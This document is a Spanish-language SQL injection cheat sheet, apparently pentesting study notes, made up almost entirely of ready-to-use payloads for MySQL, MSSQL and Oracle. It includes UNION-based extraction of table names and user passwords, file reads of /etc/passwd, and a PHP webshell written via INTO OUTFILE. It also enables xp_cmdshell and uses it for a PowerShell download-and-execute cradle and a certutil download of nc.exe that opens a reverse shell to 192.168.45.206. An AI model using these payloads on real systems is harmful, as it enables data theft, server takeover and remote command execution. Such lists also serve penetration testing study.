Inyecciones SQL - Checklist

MySQL

Obtener el número de columnas

-1 ORDER BY 3;#
-1 ORDER BY 3;-- -

Obtener la versión

-1 UNION SELECT 1,VERSION(),3;#

Obtener el nombre de la base de datos en uso

-1 UNION SELECT 1,DATABASE(),3;#

Obtener nombre de las tablas

-1 UNION SELECT 1,2, GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="<DATABASE>";#

Obtener el nombre de las columnas

-1 UNION SELECT 1,2, GROUP_CONCAT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA="<DATABASE>" AND TABLE_NAME="<TABLE>";#

Leer un archivo

SELECT LOAD_FILE('/etc/passwd')

Dump Data

-1 UNION SELECT 1,2, GROUP_CONCAT(<COLUMN>) FROM <DATABASE>.<TABLE>;#

Crear una Webshell

LOAD_FILE('/etc/httpd/conf/httpd.conf')
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/<FILE>.php";
LOAD_FILE('/etc/httpd/conf/httpd.conf')
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/<FILE>.php" -- //

MSSQL

Bypass de Autenticación

' or 1=1--

Obtener la versión con una Time-Based Injection

' SELECT @@version; WAITFOR DELAY '00:00:10'; 

Habilitar xp_cmdshell

' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

Ejecución Remota de Comandos (RCE)

' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>/<FILE>.ps1')" ;--
' EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.206:/nc.exe C:\windows\temp\nc.exe';EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.206 4444 -e cmd.exe';--

Oracle SQL

Bypass de Autenticación

' or 1=1--

Obtener el número de columnas

' order by 3--

Obtener el nombre de la tabla

' union select null,table_name,null from all_tables--

Obtener el nombre de la columna

' union select null,column_name,null from all_tab_columns where table_name='<TABLE>'--

Dump Data

' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--

Error-based SQL Injection (SQLi)

<USERNAME>' OR 1=1 -- //

Genera la siguiente consulta

SELECT * FROM users WHERE user_name= '<USERNAME>' OR 1=1 --
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

UNION-based SQL Injection (SQLi)

Inyección SQL manual - Pasos

// Vulnerable pattern shown for reference: the untrusted request value $_POST["search"]
// is concatenated straight into the SQL string, which is why the payloads below become
// part of the executed query. Mitigation: bind the value through a prepared statement
// (placeholder + parameter) instead of string interpolation, and apply the LIKE
// wildcard to the bound value rather than the query text.
$query = "SELECT * FROM customers WHERE name LIKE '".$_POST["search"]."%'";
' ORDER BY 1-- //
%' UNION SELECT database(), user(), @@version, null, null -- //
%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //
' UNION SELECT null, username, password, description, null FROM users -- //

Blind SQL Injection (SQLi)

http://<RHOST>/index.php?user=<USERNAME>' AND 1=1 -- //
http://<RHOST>/index.php?user=<USERNAME>' AND 1=1 -- //

SQL Truncation Attack

'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'